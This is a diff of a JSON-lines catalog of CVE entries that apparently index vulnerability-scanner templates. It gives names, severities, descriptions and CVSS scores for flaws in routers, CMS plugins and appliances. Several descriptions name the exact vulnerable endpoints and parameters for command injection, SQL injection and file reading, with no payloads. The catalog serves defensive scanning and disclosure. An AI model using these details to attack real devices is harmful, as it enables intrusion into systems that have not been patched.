'BSW_cxttongr.htm' which can allow a remote attacker to access this page without any authentication. The attacker can then use this password to gain administrator access of the targeted router's web interface.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2016/CVE-2016-5649.yaml"} +{"ID":"CVE-2016-5674","Info":{"Name":"NUUO NVR camera `debugging_center_utils_.php` - Command Execution","Severity":"critical","Description":"__debugging_center_utils___.php in NUUO NVRmini 2 1.7.5 through 3.0.0, NUUO NVRsolo 1.7.5 through 3.0.0, and NETGEAR ReadyNAS Surveillance 1.1.1 through 1.4.1 allows remote attackers to execute arbitrary PHP code via the log parameter.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2016/CVE-2016-5674.yaml"} {"ID":"CVE-2016-6195","Info":{"Name":"vBulletin \u003c= 4.2.3 - SQL Injection","Severity":"critical","Description":"vBulletin versions 3.6.0 through 4.2.3 are vulnerable to an SQL injection vulnerability in the vBulletin core forumrunner addon. The vulnerability allows an attacker to execute arbitrary SQL queries and potentially access sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2016/CVE-2016-6195.yaml"} {"ID":"CVE-2016-6277","Info":{"Name":"NETGEAR Routers - Remote Code Execution","Severity":"high","Description":"NETGEAR routers R6250 before 1.0.4.6.Beta, R6400 before 1.0.1.18.Beta, R6700 before 1.0.1.14.Beta, R6900, R7000 before 1.0.7.6.Beta, R7100LG before 1.0.0.28.Beta, R7300DST before 1.0.0.46.Beta, R7900 before 1.0.1.8.Beta, R8000 before 1.0.3.26.Beta, D6220, D6400, D7000, and possibly others allow remote attackers to execute arbitrary commands via shell metacharacters in the path info to cgi-bin/.","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2016/CVE-2016-6277.yaml"} {"ID":"CVE-2016-6601","Info":{"Name":"ZOHO WebNMS Framework \u003c5.2 SP1 - Local File Inclusion","Severity":"high","Description":"ZOHO WebNMS Framework before version 5.2 SP1 is vulnerable local file inclusion which allows an attacker to read arbitrary files via a .. (dot dot) in the fileName parameter to servlets/FetchFile.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2016/CVE-2016-6601.yaml"} @@ -491,6 +492,10 @@ {"ID":"CVE-2018-10201","Info":{"Name":"Ncomputing vSPace Pro 10 and 11 - Directory Traversal","Severity":"high","Description":"Ncomputing vSpace Pro versions 10 and 11 suffer from a directory traversal vulnerability.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-10201.yaml"} {"ID":"CVE-2018-10230","Info":{"Name":"Zend Server \u003c9.13 - Cross-Site Scripting","Severity":"medium","Description":"Zend Server before version 9.13 is vulnerable to cross-site scripting via the debug_host parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2018/CVE-2018-10230.yaml"} {"ID":"CVE-2018-10562","Info":{"Name":"Dasan GPON Devices - Remote Code Execution","Severity":"critical","Description":"Dasan GPON home routers are susceptible to command injection which can occur via the dest_host parameter in a diag_action=ping request to a GponForm/diag_Form URI. Because the router saves ping results in /tmp and transmits them to the user when the user revisits /diag.html, it's quite simple to execute commands and retrieve their output.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-10562.yaml"} +{"ID":"CVE-2018-10735","Info":{"Name":"NagiosXI \u003c= 5.4.12 `commandline.php` SQL injection","Severity":"high","Description":"A SQL injection issue was discovered in Nagios XI before 5.4.13 via the admin/commandline.php cname parameter.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2018/CVE-2018-10735.yaml"} +{"ID":"CVE-2018-10736","Info":{"Name":"NagiosXI \u003c= 5.4.12 - SQL injection","Severity":"high","Description":"A SQL injection issue was discovered in Nagios XI before 5.4.13 via the admin/info.php key1 parameter.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2018/CVE-2018-10736.yaml"} +{"ID":"CVE-2018-10737","Info":{"Name":"NagiosXI \u003c= 5.4.12 logbook.php SQL injection","Severity":"high","Description":"A SQL injection issue was discovered in Nagios XI before 5.4.13 via the admin/logbook.php txtSearch parameter.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2018/CVE-2018-10737.yaml"} +{"ID":"CVE-2018-10738","Info":{"Name":"NagiosXI \u003c= 5.4.12 menuaccess.php - SQL injection","Severity":"high","Description":"A SQL injection issue was discovered in Nagios XI before 5.4.13 via the admin/menuaccess.php chbKey1 parameter.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2018/CVE-2018-10738.yaml"} {"ID":"CVE-2018-10818","Info":{"Name":"LG NAS Devices - Remote Code Execution","Severity":"critical","Description":"LG NAS devices contain a pre-auth remote command injection via the \"password\" parameter.","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2018/CVE-2018-10818.yaml"} {"ID":"CVE-2018-10822","Info":{"Name":"D-Link Routers - Local File Inclusion","Severity":"high","Description":"D-Link routers DWR-116 through 1.06, DIR-140L through 1.02, DIR-640L through 1.02,DWR-512 through 2.02,DWR-712 through 2.02,DWR-912 through 2.02, DWR-921 through 2.02, DWR-111 through 1.01, and probably others with the same type of firmware allows remote attackers to read arbitrary files via a /.. or // after \"GET /uir\" in an HTTP request to the web interface.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-10822.yaml"} {"ID":"CVE-2018-10823","Info":{"Name":"D-Link Routers - Remote Command Injection","Severity":"high","Description":"D-Link DWR-116 through 1.06, DWR-512 through 2.02, DWR-712 through 2.02, DWR-912 through 2.02, DWR-921 through 2.02, and DWR-111 through 1.01 device may allow an authenticated attacker to execute arbitrary code by injecting the shell command into the chkisg.htm page Sip parameter. This allows for full control over the device internals.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2018/CVE-2018-10823.yaml"} @@ -610,9 +615,11 @@ {"ID":"CVE-2018-6184","Info":{"Name":"Zeit Next.js \u003c4.2.3 - Local File Inclusion","Severity":"high","Description":"Zeit Next.js before 4.2.3 is susceptible to local file inclusion under the /_next request namespace. An attacker can obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-6184.yaml"} {"ID":"CVE-2018-6200","Info":{"Name":"vBulletin - Open Redirect","Severity":"medium","Description":"vBulletin 3.x.x and 4.2.x through 4.2.5 contains an open redirect vulnerability via the redirector.php URL parameter. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2018/CVE-2018-6200.yaml"} {"ID":"CVE-2018-6530","Info":{"Name":"D-Link - Unauthenticated Remote Code Execution","Severity":"critical","Description":"OS command injection vulnerability in soap.cgi (soapcgi_main in cgibin) in D-Link DIR-880L DIR-880L_REVA_FIRMWARE_PATCH_1.08B04 and previous versions, DIR-868L DIR868LA1_FW112b04 and previous versions, DIR-65L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 and previous versions, and DIR-860L DIR860LA1_FW110b04 and previous versions allows remote attackers to execute arbitrary OS commands via the service parameter.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-6530.yaml"} +{"ID":"CVE-2018-6605","Info":{"Name":"Joomla! Component Zh BaiduMap 3.0.0.1 - SQL Injection","Severity":"critical","Description":"SQL Injection exists in the Zh BaiduMap 3.0.0.1 component for Joomla! via the id parameter in a getPlacemarkDetails, getPlacemarkHoverText, getPathHoverText, or getPathDetails request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-6605.yaml"} {"ID":"CVE-2018-6910","Info":{"Name":"DedeCMS 5.7 - Path Disclosure","Severity":"high","Description":"DedeCMS 5.7 allows remote attackers to discover the full path via a direct request for include/downmix.inc.php or inc/inc_archives_functions.php","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-6910.yaml"} {"ID":"CVE-2018-7251","Info":{"Name":"Anchor CMS 0.12.3 - Error Log Exposure","Severity":"critical","Description":"Anchor CMS 0.12.3 is susceptible to an error log exposure vulnerability due to an issue in config/error.php. The error log is exposed at an errors.log URI, and contains MySQL credentials if a MySQL error (such as \"Too many connections\") has occurred.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-7251.yaml"} {"ID":"CVE-2018-7282","Info":{"Name":"TITool PrintMonitor - Blind SQL Injection","Severity":"critical","Description":"The username parameter of the TITool PrintMonitor solution during the login request is vulnerable to and/or time-based blind SQLi.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-7282.yaml"} +{"ID":"CVE-2018-7314","Info":{"Name":"Joomla! Component PrayerCenter 3.0.2 - SQL Injection","Severity":"critical","Description":"SQL Injection exists in the PrayerCenter 3.0.2 component for Joomla! via the sessionid parameter, a different vulnerability than CVE-2008-6429.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-7314.yaml"} {"ID":"CVE-2018-7422","Info":{"Name":"WordPress Site Editor \u003c=1.1.1 - Local File Inclusion","Severity":"high","Description":"WordPress Site Editor through 1.1.1 allows remote attackers to retrieve arbitrary files via the ajax_path parameter to editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-7422.yaml"} {"ID":"CVE-2018-7467","Info":{"Name":"AxxonSoft Axxon Next - Local File Inclusion","Severity":"high","Description":"AxxonSoft Axxon Next suffers from a local file inclusion vulnerability.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-7467.yaml"} {"ID":"CVE-2018-7490","Info":{"Name":"uWSGI PHP Plugin Local File Inclusion","Severity":"high","Description":"uWSGI PHP Plugin before 2.0.17 mishandles a DOCUMENT_ROOT check during use of the --php-docroot option, making it susceptible to local file inclusion.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-7490.yaml"} @@ -788,6 +795,7 @@ {"ID":"CVE-2019-8982","Info":{"Name":"Wavemaker Studio 6.6 - Local File Inclusion/Server-Side Request Forgery","Severity":"critical","Description":"WaveMaker Studio 6.6 mishandles the studioService.download?method=getContent\u0026inUrl= value in com/wavemaker/studio/StudioService.java, leading to disclosure of local files and server-side request forgery.","Classification":{"CVSSScore":"9.6"}},"file_path":"http/cves/2019/CVE-2019-8982.yaml"} {"ID":"CVE-2019-9041","Info":{"Name":"ZZZCMS 1.6.1 - Remote Code Execution","Severity":"high","Description":"ZZZCMS zzzphp V1.6.1 is vulnerable to remote code execution via the inc/zzz_template.php file because the parserIfLabel() function's filtering is not strict, resulting in PHP code execution as demonstrated by the if:assert substring.","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2019/CVE-2019-9041.yaml"} {"ID":"CVE-2019-9618","Info":{"Name":"WordPress GraceMedia Media Player 1.0 - Local File Inclusion","Severity":"critical","Description":"WordPress GraceMedia Media Player plugin 1.0 is susceptible to local file inclusion via the cfg parameter.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-9618.yaml"} +{"ID":"CVE-2019-9632","Info":{"Name":"ESAFENET CDG - Arbitrary File Download","Severity":"high","Description":"ESAFENET CDG V3 and V5 has an arbitrary file download vulnerability via the fileName parameter in download.jsp because the InstallationPack parameter is mishandled in a /CDGServer3/ClientAjax request.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2019/CVE-2019-9632.yaml"} {"ID":"CVE-2019-9670","Info":{"Name":"Synacor Zimbra Collaboration \u003c8.7.11p10 - XML External Entity Injection","Severity":"critical","Description":"Synacor Zimbra Collaboration Suite 8.7.x before 8.7.11p10 has an XML external entity injection (XXE) vulnerability via the mailboxd component.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-9670.yaml"} {"ID":"CVE-2019-9726","Info":{"Name":"Homematic CCU3 - Local File Inclusion","Severity":"high","Description":"eQ-3 AG Homematic CCU3 3.43.15 and earlier allows remote attackers to read arbitrary files of the device's filesystem, aka local file inclusion. This vulnerability can be exploited by unauthenticated attackers with access to the web interface.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2019/CVE-2019-9726.yaml"} {"ID":"CVE-2019-9733","Info":{"Name":"JFrog Artifactory 6.7.3 - Admin Login Bypass","Severity":"critical","Description":"JFrog Artifactory 6.7.3 is vulnerable to an admin login bypass issue because by default the access-admin account is used to reset the password of the admin account. While this is only allowable from a connection directly from localhost, providing an X-Forwarded-For HTTP header to the request allows an unauthenticated user to login with the default credentials of the access-admin account while bypassing the whitelist of allowed IP addresses. The access-admin account can use Artifactory's API to request authentication tokens for all users including the admin account and, in turn, assume full control of all artifacts and repositories managed by Artifactory.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-9733.yaml"} @@ -1409,7 +1417,7 @@ {"ID":"CVE-2021-41174","Info":{"Name":"Grafana 8.0.0 \u003c= v.8.2.2 - Angularjs Rendering Cross-Site Scripting","Severity":"medium","Description":"Grafana is an open-source platform for monitoring and observability. In affected versions if an attacker is able to convince a victim to visit a URL referencing a vulnerable page, arbitrary JavaScript content may be executed within the context of the victim's browser. The user visiting the malicious link must be unauthenticated and the link must be for a page that contains the login button in the menu bar. The url has to be crafted to exploit AngularJS rendering and contain the interpolation binding for AngularJS expressions.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-41174.yaml"} {"ID":"CVE-2021-41192","Info":{"Name":"Redash Setup Configuration - Default Secrets Disclosure","Severity":"medium","Description":"Redash Setup Configuration is vulnerable to default secrets disclosure (Insecure Default Initialization of Resource). If an admin sets up Redash versions \u003c=10.0 and prior without explicitly specifying the `REDASH_COOKIE_SECRET` or `REDASH_SECRET_KEY` environment variables, a default value is used for both that is the same across all installations. In such cases, the instance is vulnerable to attackers being able to forge sessions using the known default value.","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2021/CVE-2021-41192.yaml"} {"ID":"CVE-2021-41266","Info":{"Name":"MinIO Operator Console Authentication Bypass","Severity":"critical","Description":"MinIO Console is a graphical user interface for the for MinIO Operator. MinIO itself is a multi-cloud object storage project. Affected versions are subject to an authentication bypass issue in the Operator Console when an external IDP is enabled.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-41266.yaml"} -{"ID":"CVE-2021-41277","Info":{"Name":"Metabase Local File Inclusion","Severity":"high","Description":"Metabase is an open source data analytics platform. In affected versions a local file inclusion security issue has been discovered with the custom GeoJSON map (`admin-\u003esettings-\u003emaps-\u003ecustom maps-\u003eadd a map`) support and potential local file inclusion (including environment variables). URLs were not validated prior to being loaded.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-41277.yaml"} +{"ID":"CVE-2021-41277","Info":{"Name":"Metabase - Local File Inclusion","Severity":"high","Description":"Metabase is an open source data analytics platform. In affected versions a local file inclusion security issue has been discovered with the custom GeoJSON map (`admin-\u003esettings-\u003emaps-\u003ecustom maps-\u003eadd a map`) support and potential local file inclusion (including environment variables). URLs were not validated prior to being loaded.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-41277.yaml"} {"ID":"CVE-2021-41282","Info":{"Name":"pfSense - Arbitrary File Write","Severity":"high","Description":"diag_routes.php in pfSense 2.5.2 allows sed data injection. Authenticated users are intended to be able to view data about the routes set in the firewall. The data is retrieved by executing the netstat utility, and then its output is parsed via the sed utility. Although the common protection mechanisms against command injection (e.g., the usage of the escapeshellarg function for the arguments) are used, it is still possible to inject sed-specific code and write an arbitrary file in an arbitrary location.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2021/CVE-2021-41282.yaml"} {"ID":"CVE-2021-41291","Info":{"Name":"ECOA Building Automation System - Directory Traversal Content Disclosure","Severity":"high","Description":"The ECOA BAS controller suffers from a directory traversal content disclosure vulnerability. Using the GET parameter cpath in File Manager (fmangersub), attackers can disclose directory content on the affected device","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-41291.yaml"} {"ID":"CVE-2021-41293","Info":{"Name":"ECOA Building Automation System - Arbitrary File Retrieval","Severity":"high","Description":"The ECOA BAS controller suffers from an arbitrary file disclosure vulnerability. Using the 'fname' POST parameter in viewlog.jsp, attackers can disclose arbitrary files on the affected device and disclose sensitive and system information.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-41293.yaml"} @@ -1488,6 +1496,8 @@ {"ID":"CVE-2021-46381","Info":{"Name":"D-Link DAP-1620 - Local File Inclusion","Severity":"high","Description":"D-Link DAP-1620 is susceptible to local file Inclusion due to path traversal that can lead to unauthorized internal files reading [/etc/passwd] and [/etc/shadow].","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-46381.yaml"} {"ID":"CVE-2021-46387","Info":{"Name":"Zyxel ZyWALL 2 Plus Internet Security Appliance - Cross-Site Scripting","Severity":"medium","Description":"ZyXEL ZyWALL 2 Plus Internet Security Appliance contains a cross-site scripting vulnerability. Insecure URI handling leads to bypass of security restrictions, which allows an attacker to execute arbitrary JavaScript codes to perform multiple attacks.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-46387.yaml"} {"ID":"CVE-2021-46417","Info":{"Name":"Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 - Local File Inclusion","Severity":"high","Description":"Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 is susceptible to local file inclusion because of insecure handling of a download function that leads to disclosure of internal files due to path traversal with root privileges.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-46417.yaml"} +{"ID":"CVE-2021-46418","Info":{"Name":"Telesquare TLR-2855KS6 - Arbitrary File Creation","Severity":"high","Description":"An unauthorized file creation vulnerability in Telesquare TLR-2855KS6 via PUT method can allow creation of CGI scripts.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-46418.yaml"} +{"ID":"CVE-2021-46419","Info":{"Name":"Telesquare TLR-2855KS6 - Arbitrary File Deletion","Severity":"critical","Description":"An unauthorized file deletion vulnerability in Telesquare TLR-2855KS6 via DELETE method can allow deletion of system files and scripts.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2021/CVE-2021-46419.yaml"} {"ID":"CVE-2021-46422","Info":{"Name":"SDT-CW3B1 1.1.0 - OS Command Injection","Severity":"critical","Description":"Telesquare SDT-CW3B1 1.1.0 is affected by an OS command injection vulnerability that allows a remote attacker to execute OS commands without any authentication.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-46422.yaml"} {"ID":"CVE-2021-46424","Info":{"Name":"Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Delete","Severity":"critical","Description":"Telesquare TLR-2005KSH 1.0.0 is affected by an arbitrary file deletion vulnerability that allows a remote attacker to delete any file, even system internal files, via a DELETE request.","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2021/CVE-2021-46424.yaml"} {"ID":"CVE-2021-46704","Info":{"Name":"GenieACS =\u003e 1.2.8 - OS Command Injection","Severity":"critical","Description":"In GenieACS 1.2.x before 1.2.8, the UI interface API is vulnerable to unauthenticated OS command injection via the ping host argument (lib/ui/api.ts and lib/ping.ts). The vulnerability arises from insufficient input validation combined with a missing authorization check.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-46704.yaml"} @@ -1597,7 +1607,7 @@ {"ID":"CVE-2022-1595","Info":{"Name":"WordPress HC Custom WP-Admin URL \u003c=1.4 - Admin Login URL Disclosure","Severity":"medium","Description":"WordPress HC Custom WP-Admin URL plugin through 1.4 leaks the secret login URL when sending a specially crafted request, thereby allowing an attacker to discover the administrative login URL.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2022/CVE-2022-1595.yaml"} {"ID":"CVE-2022-1597","Info":{"Name":"WordPress WPQA \u003c5.4 - Cross-Site Scripting","Severity":"medium","Description":"WordPress WPQA plugin prior to 5.4 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape a parameter on its reset password form.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-1597.yaml"} {"ID":"CVE-2022-1598","Info":{"Name":"WordPress WPQA \u003c5.5 - Improper Access Control","Severity":"medium","Description":"WordPress WPQA plugin before 5.5 is susceptible to improper access control. The plugin lacks authentication in a REST API endpoint. An attacker can potentially discover private questions sent between users on the site.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2022/CVE-2022-1598.yaml"} -{"ID":"CVE-2022-1609","Info":{"Name":"The School Management \u003c 9.9.7 - Remote Code Execution","Severity":"critical","Description":"The School Management plugin before version 9.9.7 contains an obfuscated backdoor injected in it's license checking code that registers a REST API handler, allowing an unauthenticated attacker to execute arbitrary PHP code on the site.","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2022/CVE-2022-1609.yaml"} +{"ID":"CVE-2022-1609","Info":{"Name":"The School Management \u003c 9.9.7 - Remote Code Execution","Severity":"critical","Description":"The School Management plugin before version 9.9.7 contains an obfuscated backdoor injected in it's license checking code that registers a REST API handler, allowing an unauthenticated attacker to execute arbitrary PHP code on the site.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-1609.yaml"} {"ID":"CVE-2022-1713","Info":{"Name":"Drawio \u003c18.0.4 - Server-Side Request Forgery","Severity":"high","Description":"Drawio prior to 18.0.4 is vulnerable to server-side request forgery. An attacker can make a request as the server and read its contents. This can lead to a leak of sensitive information.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-1713.yaml"} {"ID":"CVE-2022-1724","Info":{"Name":"WordPress Simple Membership \u003c4.1.1 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Simple Membership plugin before 4.1.1 contains a reflected cross-site scripting vulnerability. It does not properly sanitize and escape parameters before outputting them back in AJAX actions.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-1724.yaml"} {"ID":"CVE-2022-1756","Info":{"Name":"Newsletter \u003c 7.4.5 - Cross-Site Scripting","Severity":"medium","Description":"The Newsletter WordPress plugin before 7.4.5 does not sanitize and escape the $_SERVER['REQUEST_URI'] before echoing it back in admin pages. Although this uses addslashes, and most modern browsers automatically URLEncode requests, this is still vulnerable to Reflected XSS in older browsers such as Internet Explorer 9 or below.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-1756.yaml"} @@ -1706,7 +1716,7 @@ {"ID":"CVE-2022-2633","Info":{"Name":"All-In-One Video Gallery \u003c=2.6.0 - Server-Side Request Forgery","Severity":"high","Description":"WordPress All-in-One Video Gallery plugin through 2.6.0 is susceptible to arbitrary file download and server-side request forgery (SSRF) via the 'dl' parameter found in the ~/public/video.php file. An attacker can download sensitive files hosted on the affected server and forge requests to the server.\n","Classification":{"CVSSScore":"8.2"}},"file_path":"http/cves/2022/CVE-2022-2633.yaml"} {"ID":"CVE-2022-26352","Info":{"Name":"DotCMS - Arbitrary File Upload","Severity":"critical","Description":"DotCMS management system contains an arbitrary file upload vulnerability via the /api/content/ path which can allow attackers to upload malicious Trojans to obtain server permissions.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-26352.yaml"} {"ID":"CVE-2022-26564","Info":{"Name":"HotelDruid Hotel Management Software 3.0.3 - Cross-Site Scripting","Severity":"medium","Description":"HotelDruid Hotel Management Software 3.0.3 contains a cross-site scripting vulnerability via the prezzoperiodo4 parameter in creaprezzi.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-26564.yaml"} -{"ID":"CVE-2022-26833","Info":{"Name":"Open Automation Software OAS Platform V16.00.0121 - Missing Authentication","Severity":"critical","Description":"An improper authentication vulnerability exists in the REST API functionality of Open Automation Software OAS Platform V16.00.0121. A specially-crafted series of HTTP requests can lead to unauthenticated use of the REST API. An attacker can send a series of HTTP requests to trigger this vulnerability.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-26833.yaml"} +{"ID":"CVE-2022-26833","Info":{"Name":"Open Automation Software OAS Platform V16.00.0121 - Missing Authentication","Severity":"critical","Description":"An improper authentication vulnerability exists in the REST API functionality of Open Automation Software OAS Platform V16.00.0121. A specially-crafted series of HTTP requests can lead to unauthenticated use of the REST API. An attacker can send a series of HTTP requests to trigger this vulnerability.\n","Classification":{"CVSSScore":"9.4"}},"file_path":"http/cves/2022/CVE-2022-26833.yaml"} {"ID":"CVE-2022-26960","Info":{"Name":"elFinder \u003c=2.1.60 - Local File Inclusion","Severity":"critical","Description":"elFinder through 2.1.60 is affected by local file inclusion via connector.minimal.php. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2022/CVE-2022-26960.yaml"} {"ID":"CVE-2022-2733","Info":{"Name":"Openemr \u003c 7.0.0.1 - Cross-Site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) - Reflected in GitHub repository openemr/openemr prior to 7.0.0.1.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-2733.yaml"} {"ID":"CVE-2022-2756","Info":{"Name":"Kavita \u003c0.5.4.1 - Server-Side Request Forgery","Severity":"medium","Description":"Kavita before 0.5.4.1 is susceptible to server-side request forgery in GitHub repository kareadita/kavita. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2022/CVE-2022-2756.yaml"} @@ -1734,6 +1744,7 @@ {"ID":"CVE-2022-29006","Info":{"Name":"Directory Management System 1.0 - SQL Injection","Severity":"critical","Description":"Directory Management System 1.0 contains multiple SQL injection vulnerabilities via the username and password parameters in the Admin panel. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-29006.yaml"} {"ID":"CVE-2022-29007","Info":{"Name":"Dairy Farm Shop Management System 1.0 - SQL Injection","Severity":"critical","Description":"Dairy Farm Shop Management System 1.0 contains multiple SQL injection vulnerabilities via the username and password parameters in the Admin panel. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-29007.yaml"} {"ID":"CVE-2022-29009","Info":{"Name":"Cyber Cafe Management System 1.0 - SQL Injection","Severity":"critical","Description":"Cyber Cafe Management System 1.0 contains multiple SQL injection vulnerabilities via the username and password parameters in the Admin panel. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-29009.yaml"} +{"ID":"CVE-2022-29013","Info":{"Name":"Razer Sila Gaming Router - Remote Code Execution","Severity":"critical","Description":"A command injection in the command parameter of Razer Sila Gaming Router v2.0.441_api-2.0.418 allows attackers to execute arbitrary commands via a crafted POST request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-29013.yaml"} {"ID":"CVE-2022-29014","Info":{"Name":"Razer Sila Gaming Router 2.0.441_api-2.0.418 - Local File Inclusion","Severity":"high","Description":"Razer Sila Gaming Router 2.0.441_api-2.0.418 is vulnerable to local file inclusion which could allow attackers to read arbitrary files.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-29014.yaml"} {"ID":"CVE-2022-29078","Info":{"Name":"Node.js Embedded JavaScript 3.1.6 - Template Injection","Severity":"critical","Description":"Node.js Embedded JavaScript 3.1.6 is susceptible to server-side template injection via settings[view options][outputFunctionName], which is parsed as an internal option and overwrites the outputFunctionName option with an arbitrary OS command, which is then executed upon template compilation.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-29078.yaml"} {"ID":"CVE-2022-29153","Info":{"Name":"HashiCorp Consul/Consul Enterprise - Server-Side Request Forgery","Severity":"high","Description":"HashiCorp Consul and Consul Enterprise up to 1.9.16, 1.10.9, and 1.11 are susceptible to server-side request forgery. When redirects are returned by HTTP health check endpoints, Consul follows these HTTP redirects by default. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-29153.yaml"} @@ -1796,6 +1807,7 @@ {"ID":"CVE-2022-32409","Info":{"Name":"Portal do Software Publico Brasileiro i3geo 7.0.5 - Local File Inclusion","Severity":"critical","Description":"Portal do Software Publico Brasileiro i3geo 7.0.5 is vulnerable to local file inclusion in the component codemirror.php, which allows attackers to execute arbitrary PHP code via a crafted HTTP request.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-32409.yaml"} {"ID":"CVE-2022-3242","Info":{"Name":"Microweber \u003c1.3.2 - Cross-Site Scripting","Severity":"medium","Description":"Code Injection in on search.php?keywords= GitHub repository microweber/microweber prior to 1.3.2.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-3242.yaml"} {"ID":"CVE-2022-32429","Info":{"Name":"MSNSwitch Firmware MNT.2408 - Authentication Bypass","Severity":"critical","Description":"MSNSwitch Firmware MNT.2408 is susceptible to authentication bypass in the component http://MYDEVICEIP/cgi-bin-sdb/ExportSettings.sh. An attacker can arbitrarily configure settings, leading to possible remote code execution and subsequent unauthorized 